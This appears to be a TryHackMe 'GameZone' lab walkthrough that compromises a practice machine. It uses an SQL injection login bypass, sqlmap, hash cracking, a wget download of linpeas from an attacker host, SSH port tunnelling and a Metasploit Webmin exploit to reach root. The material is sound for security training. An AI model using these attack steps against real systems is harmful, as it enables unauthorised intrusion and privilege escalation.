GameZone | Advanced Exploitation | TryHackMe
In this walkthrough, we will be hacking into the GameZone website and perform numerous attacks to brute force for logins, revealing vulnerable services and gaining administrators privilleges.
A quick look at the website, we are presented with a login form and a cartoon avatar who upon reverse imaging we identify him as Agent47.
SQL Injection
We need to proceed to login into the website. A trial and error on the commonly used passwords renders futile.
Since we know this site is vulnerable to the sqli injection, we should try ;
' or 1=1#on both the username and the password and to our surprise, we are logged in.
We get some kind of a search portal.
Usually, with this kind of portal, we can try enumerating for hidden directories using gobuster or ffuz, or go for sqlmap enumeration.
Sqlmap
In this room, we will be using sqlmap to reveal crucial information. First we start by grabbing the search request via burp suite and saving it in a file.
Hurrah! we have cracked the password and the username. ‘videogamer124’, ‘agent47’ . We also got some interesting information. ‘we have a hash id for agent47’
We can crack the hash using john the ripper and confirm whether the password was right.
We can proceed to ssh into agent47 and using his password look for interesting information there.
In order to escalate our privileges to root, we need to find binaries that we can use to manipulate using linPEAS.sh
Linpeas.sh
python3 -m http.server 8000wget http://10.10.10.10/linpeas.shOnce linPEAS.sh has been installed on agent47 side, we will proceed to run it.
Oops! permission denied. This means we need to grant permissions to the file.
chmod +x linpeas.shFrom the linpeas.sh results, we find intresting open ports
A look at our local ports
It is clear we need to tunnel the ports to our local machine, this way we can try and access it locally.
Port Tunneling
ssh -L 10000:localhost:10000 <username>@<ip>In this case, the port that works with our localhost is port 10000 which it directs us to a login page.
Using the same login credentials we are logged in.
Webmin? sounds like a worthy shot, lets see if we find any vulnerabilities using searchploit.
We have the exploit to use, ‘Remote command Execution’, lets cat into it and find the instructions.
searchsploit -m exploits/unix/remote/21851.rbThe file is a metasploit framework, this means we can use metasploit to compromise this machine.
Metasploit
Selecting the exploit to unix/webapp/webmin_show_cgi_exe we see the options required to be set as shown above and exploit.
We got a session, which upon interacting with, we are root.
a quick look into cd /root we can capture the root flag.
Bingo, we compromised this machine.
Thank you for reading. Happy hacking